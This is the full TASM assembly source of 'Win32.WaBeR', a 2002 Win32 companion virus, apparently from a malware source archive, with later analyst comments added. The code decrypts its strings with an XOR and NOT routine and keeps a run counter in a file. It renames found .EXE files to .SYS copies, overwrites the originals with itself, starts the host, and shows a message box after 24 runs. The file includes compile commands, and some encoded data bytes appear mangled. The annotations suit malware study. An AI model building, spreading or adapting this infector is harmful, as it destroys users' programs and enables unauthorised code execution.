MalwareSourceCode/Win32/Infector/Win32.Waber.asm

;===========================================================================================
; ...:: Win32.WaBeR - ViruS ::...
; Version 2.4
; by -DiA- (c) 02
; GermanY
;
;
;
; Here it is! My 1st Win32.Companion Virus ...success!!! :)
; Don't grumble about the code, it's my 2nd Win32.Virus... ...and I go on. =)
; DiA_hates_machine@gmx.de
;
;
;
; Some Comments:
; -decrypt the strings
; -read the counter >not exist = MAKE IT!
; >if not 0 = go to the virus and infect some files
; >if 0 = jmp to PAYLOAD
; -payload:
; +after 24 starts the payload activates
; +it prints a nice message:
; ...:Weed And BEer Rulez:...
; Win32.WaBeR - ViruS
; Version 2.4
; by -DiA- (c)02
; [PLEASE RESET THE WaBeR-COUNTER : "C:\WaBeR.dll"]
; -virus renames found .EXE to .SYS file
; -virus copy itself to the .EXE file
; -after work the host runs!
; -allright...
;
;
; Greetz to Monochrom - without you, this virus can't live :)
;
;
; To Compile the WaBeR - ViruS:
; tasm32 /z /ml /m3 WaBeR24,,;
; tlink32 -Tpe -c WaBeR24,WaBeR24,, import32.lib
;
; To Compile the WaBeR - SYS:
; tasm32 /z /ml /m3 WaBeR24sys,,;
; tlink32 -Tpe -c WaBeR24sys,WaBeR24sys,, import32.lib
; rename WaBeR24sys.exe WaBeR24.sys
;===========================================================================================
;*******************************************************************************************
;*****cut*****WaBeR24.sys*******************************************************************
;.386
;.model flat
;jumps
;
;extrn MessageBoxA:PROC
;extrn ExitProcess:PROC
;
;.data
;titel db '1st Generation',0
;msg db 'Win32.WaBeR - Virus',10,13
; db 'Version 2.4',10,13
; db 'by -DiA- (c)02',10,13
; db '[my 1st companion virus in win32]',0
;
;.code
;start:
;
;push 16
;push offset titel
;push offset msg
;push 0
;call MessageBoxA
;
;push 0
;call ExitProcess
;
;end start
;*****cut*****WaBeR24.sys*******************************************************************
;*******************************************************************************************
;=====Have Fun...===========================================================================
; Assembler dialect: TASM/MASM (.model flat, extrn, `offset`, the TASM-only
; `jumps` directive) — the build lines in the header use tasm32/tlink32.
; This is NOT NASM syntax despite the repository tag.
.386
.model flat
jumps                                   ; TASM: auto-widen out-of-range conditional jumps
; Imported Win32 API, resolved at link time through import32.lib (see header).
; Analyst note: the import set alone — directory enumeration, CopyFileA,
; CreateProcessA, MessageBoxA, raw file I/O and no FindClose — already outlines
; the companion-infector behaviour the header describes.
extrn GetCommandLineA:PROC
extrn lstrcpyA:PROC
extrn FindFirstFileA:PROC
extrn CopyFileA:PROC
extrn FindNextFileA:PROC
extrn CreateProcessA:PROC
extrn ExitProcess:PROC
extrn MessageBoxA:PROC
extrn OpenFile:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn ReadFile:PROC
extrn CloseHandle:PROC
extrn SetFilePointer:PROC
.data
FileName db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',-70
titel db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ޚ<EFBFBD><DE9A>ޚ<EFBFBD><DE9A><EFBFBD>Ț<EFBFBD><C89A><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',-70
msg db '<27><>ԉ<EFBFBD><D489><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E89A97><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',-80,-73
db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ԛ<EFBFBD><D49A><EFBFBD>',-80,-73
db '<27>Ú<EFBFBD><C39A><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ٓ<EFBFBD><D993>',-80,-73,-80,-73,-80,-73
db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E89A80><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֘<EFBFBD>',-70
FirstNum db '<27>',-70
FileMask db '<27><><EFBFBD><EFBFBD><EFBFBD>',-70
; Working variables.  The byte strings above (FileName .. FileMask) are stored
; transformed and decoded in place by DeCrypt at start; their plaintext is not
; visible in this listing (the header names C:\WaBeR.dll as the counter file).
; One-byte counter read from / written back to the counter file (see start:).
Number db 01d dup (0)
; Passed to OpenFile as lpReOpenBuff (an OFSTRUCT).  A single dword is smaller
; than that structure, so OpenFile's output presumably spills into the
; variables declared below — NOTE(review): looks like a sizing bug; it only
; stays harmless because those variables are rewritten before use. Verify.
FileAttr dd 0
FileHandle dd 0                         ; handle of the counter file
Read dd 0                               ; lpNumberOfBytesRead for ReadFile
Write dd 0                              ; lpNumberOfBytesWritten for WriteFile
FindHandle dd 0                         ; FindFirstFileA result; never released (no FindClose import)
ProcessInfo dd 4 dup (0)                ; PROCESS_INFORMATION (16 bytes) for CreateProcessA
; Passed as lpStartupInfo.  16 bytes is smaller than STARTUPINFO and cb is not
; initialised — NOTE(review): CreateProcessA presumably reads past this into
; Win32FindData and beyond; confirm before relying on the RunHost call.
StartupInfo dd 4 dup (0)
; 11 dwords = 44 bytes = the fixed WIN32_FIND_DATA fields that precede
; cFileName; the structure intentionally continues into FindFile below.
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0
; Overlays WIN32_FIND_DATA.cFileName (offset 44): after each Find*FileA call this
; holds the matched file name.  200 bytes here vs. 260 in the real structure, so
; a long match name runs on into CreateFile (which is rewritten afterwards).
FindFile db 200 dup (0)
CreateFile db 200 dup (0)               ; FindFile with its extension replaced by "SYS"
VirusFile db 200 dup (0)                ; own command line, cut after the extension
OriginFile db 200 dup (0)               ; own path with extension replaced by "SYS" (the relocated host)
.code
;-------------------------------------------------------------------------------------------
; Entry point.  All labels below are jump targets, not PROCs; only SetPointer
; and DeCrypt are called.  Flow:
;   start    -> decode the string table in place (154 bytes from FileName)
;            -> OpenFile(counter file); HFILE_ERROR -> MakeFile
;   GOon     -> read one byte at offset 0; '0' -> BOOM, else decrement it,
;               write it back, close, -> WaBeR (infection, defined below)
;   MakeFile -> create the counter file, write FirstNum, -> GOon
;   BOOM     -> MessageBoxA payload, -> exit (the host is NOT started here)
; Defender note: the counter file (C:\WaBeR.dll per the header comment) is the
; only artifact this section leaves on disk; its name is only known after
; decoding and cannot be confirmed from this listing.
;-------------------------------------------------------------------------------------------
start:
;-----Decrypt all Strings-------------------------------------------------------------------
mov esi,offset FileName                 ; source = encoded string table
mov edi,esi                             ; decode in place
mov ecx,154d                            ; 154 bytes starting at FileName (presumably through FileMask)
call DeCrypt
;-------------------------------------------------------------------------------------------
;-----Check the Counter---------------------------------------------------------------------
push 2                                  ; uStyle = OF_READWRITE
push offset FileAttr                    ; lpReOpenBuff (see size note at FileAttr)
push offset FileName
call OpenFile                           ; OpenFile(FileName, &FileAttr, OF_READWRITE)
cmp eax,0FFFFFFFFh                      ; HFILE_ERROR: counter file does not exist yet
je MakeFile
mov dword ptr [FileHandle],eax
GOon:
call SetPointer                         ; rewind to offset 0
push 0                                  ; lpOverlapped = NULL
push offset Read                        ; lpNumberOfBytesRead
push 01d                                ; read exactly one byte
push offset Number
push dword ptr [FileHandle]
call ReadFile                           ; return value not checked
cmp byte ptr [Number],'0'               ; counter exhausted -> payload
je BOOM
dec byte ptr [Number]                   ; one decrement per run; the byte is compared, not parsed
call SetPointer                         ; rewind again before overwriting the byte
push 0
push offset Write
push 01d
push offset Number
push dword ptr [FileHandle]
call WriteFile
push dword ptr [FileHandle]
call CloseHandle
jmp WaBeR                               ; infect, then run the host
MakeFile:
push 0                                  ; hTemplateFile
push 80h                                ; FILE_ATTRIBUTE_NORMAL
push 2                                  ; CREATE_ALWAYS
push 0                                  ; lpSecurityAttributes
push 0                                  ; dwShareMode = no sharing
push 0C0000000h                         ; GENERIC_READ | GENERIC_WRITE
push offset FileName
call CreateFileA
; INVALID_HANDLE_VALUE is not checked.  If creation fails, the file calls below
; fail too, Number stays 0 (its initial value, not '0'), and control still
; reaches WaBeR via GOon.
mov dword ptr [FileHandle],eax
call SetPointer
push 0
push offset Write
push 01d
push offset FirstNum                    ; initial counter byte (decoded; header says 24 runs)
push dword ptr [FileHandle]
call WriteFile
jmp GOon                                ; re-read, decrement and close through the normal path
BOOM:
push dword ptr [FileHandle]
call CloseHandle
push 16                                 ; uType = MB_ICONERROR
push offset titel                       ; lpCaption
push offset msg                         ; lpText
push 0                                  ; hWnd = NULL
call MessageBoxA
jmp exit                                ; terminates without launching the host
;-------------------------------------------------------------------------------------------
; SetPointer: SetFilePointer(FileHandle, 0, NULL, FILE_BEGIN) — rewind the
; counter file.  Reads the global FileHandle; no stack frame.
; Clobbers: eax, ecx, edx (stdcall callee), flags.  Return value ignored by callers.
;-------------------------------------------------------------------------------------------
SetPointer:
push 0                                  ; dwMoveMethod = FILE_BEGIN
push 0                                  ; lpDistanceToMoveHigh = NULL
push 0                                  ; lDistanceToMove = 0
push dword ptr [FileHandle]
call SetFilePointer
ret
;-------------------------------------------------------------------------------------------
;-----Decrypt Loop--------------------------------------------------------------------------
; DeCrypt: byte-wise transform of ecx bytes from [esi] to [edi]: out = NOT(in XOR 69).
; In:   esi = src, edi = dst (the caller passes esi == edi), ecx = byte count.
;       ecx must be > 0: `loop` with ecx == 0 wraps and runs 4G iterations.
;       Direction flag assumed clear (lodsb/stosb advance forward).
; Out:  esi, edi advanced past the buffer; ecx = 0; al = last output byte.
; Clobbers: al, flags.
; Analyst note: NOT commutes with XOR, so the transform is its own inverse;
; the string table is stored transformed in .data, so the plaintext strings
; (counter path, file mask, payload text) never appear in the on-disk image.
DeCrypt:
lodsb                                   ; al = [esi++]
xor al,69d
not al
stosb                                   ; [edi++] = al
loop DeCrypt                            ; --ecx; repeat while nonzero
ret
;-------------------------------------------------------------------------------------------
;-----Infect some Filez---------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
; Infection and host launch.  Reached by jmp from start (not a PROC).
;   WaBeR    -> VirusFile = own command line cut after the first '.'+3;
;               OriginFile = VirusFile+1 with its extension replaced by "SYS"
;   FindNext -> for every match of FileMask (header: .EXE files):
;               copy <name> to <name>.SYS (fail-if-exists), then overwrite
;               <name> with the file at VirusFile+1 (this program)
;   RunHost  -> CreateProcessA(OriginFile): the .SYS companion of this exe
;   exit     -> ExitProcess(0)
; Defender-visible artifacts of this path: for each matched executable a .SYS
; of the same base name holding the original program, the executable replaced
; by a copy of this file, and a child process started from a .SYS path.
;-------------------------------------------------------------------------------------------
WaBeR:
call GetCommandLineA
push eax
push offset VirusFile
call lstrcpyA                           ; VirusFile = command line; no length check (200-byte buffer)
mov eax,offset VirusFile
GetPoint1:
cmp byte ptr [eax],'.'                  ; assumes the FIRST '.' is the extension separator
jz FoundPoint1
inc eax
jmp GetPoint1                           ; no terminator check: relies on a '.' being present
FoundPoint1:
add eax,04d                             ; step over ".xxx"
mov byte ptr [eax],00                   ; cut off anything after the extension
push offset VirusFile+1                 ; +1 presumably skips a leading quote in the command line
push offset OriginFile
call lstrcpyA
mov eax,offset OriginFile
GetPoint2:
cmp byte ptr [eax],'.'
jz FoundPoint2
inc eax
jmp GetPoint2
FoundPoint2:
inc eax                                 ; eax -> first char of the extension
mov dword ptr [eax],535953h             ; "SYS",0 little-endian: OriginFile = <self>.SYS
push offset Win32FindData
push offset FileMask                    ; decoded search mask
call FindFirstFileA
mov dword ptr [FindHandle],eax
FindNext:
cmp eax,-1                              ; INVALID_HANDLE_VALUE from FindFirstFileA
je RunHost
or eax,eax                              ; FALSE from FindNextFileA: no more matches
jz RunHost
push offset FindFile                    ; = WIN32_FIND_DATA.cFileName (see .data layout)
push offset CreateFile
call lstrcpyA
mov eax,offset CreateFile
GetPoint3:
cmp byte ptr [eax],'.'
jz FoundPoint3
inc eax
jmp GetPoint3
FoundPoint3:
inc eax
mov dword ptr [eax],535953h             ; CreateFile = <name>.SYS
push 1                                  ; bFailIfExists: an existing .SYS companion is kept
push offset CreateFile
push offset FindFile
call CopyFileA                          ; <name> -> <name>.SYS ; result ignored
push 0                                  ; bFailIfExists = FALSE: overwrite
push offset FindFile
push offset VirusFile+1
call CopyFileA                          ; <self> -> <name> ; result ignored
push offset Win32FindData
push dword ptr [FindHandle]
call FindNextFileA
jmp FindNext                            ; FindHandle is never closed (no FindClose import)
RunHost:
push offset ProcessInfo                 ; lpProcessInformation
push offset StartupInfo                 ; lpStartupInfo (undersized; see .data)
push 0                                  ; lpCurrentDirectory
push 0                                  ; lpEnvironment
push 00000010h                          ; dwCreationFlags = CREATE_NEW_CONSOLE
push 0                                  ; bInheritHandles
push 0                                  ; lpThreadAttributes
push 0                                  ; lpProcessAttributes
push offset OriginFile                  ; lpCommandLine
push offset OriginFile                  ; lpApplicationName
call CreateProcessA                     ; result ignored; host runs in a new console
exit:
push 0
call ExitProcess
;-W-E-E-D--A-N-D--B-E-E-R--R-U-L-E-Z-----DiA------------------------------------------------
end start
;===========================================================================================